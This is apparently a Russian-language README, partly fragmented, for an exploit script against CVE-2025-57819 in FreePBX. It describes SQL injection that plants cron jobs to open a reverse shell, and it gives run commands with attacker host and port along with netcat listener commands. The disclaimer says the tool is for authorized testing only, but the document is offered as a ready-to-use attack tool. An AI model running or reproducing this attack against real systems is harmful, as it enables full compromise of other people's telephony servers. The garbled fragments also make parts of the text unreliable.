
< 15.0.66, < 16.0.89 и < 17.0.3Этот скрипт эксплуатирует CVE-2025-57819 в уязвимом модуле endpoint FreePBX. Уязвимость позволяет выполнять SQL-инъекцию, которая используется для внедрения вредоносных заданий cron.
В отличие от других публичных эксплойтов, здесь не требуются дополнительные шаги, такие как взаимодействие с целью через загруженный веб-шелл. Это прямолинейный подход, который сразу предоставляет вам прямой доступ к reverse shell.
Удалённое выполнение кода достигается через SQL-инъекцию и манипуляцию заданиями cron. Успешная эксплуатация приводит к получению reverse shell на целевой системе. В зависимости от конфигурации это может привести к полной компрометации системы.
* * * * *)base64 повреждаются, когда символы + интерпретируются как пробелы.Запустите эксплойт, указав цель и конфигурацию слушателя:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: Целевое имя хоста или IP-адрес (уязвимый экземпляр FreePBX)<lhost>: IP-адрес атакующего для обратного вызова reverse shell<lport>: Порт прослушивания для входящего соединенияpython3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
Запустите слушатель перед выполнением эксплойта:
nc -lvnp <port>
nc -nlvp 9999
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование против систем без явного разрешения незаконно. Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим инструментом.
Its1Zero - [email protected]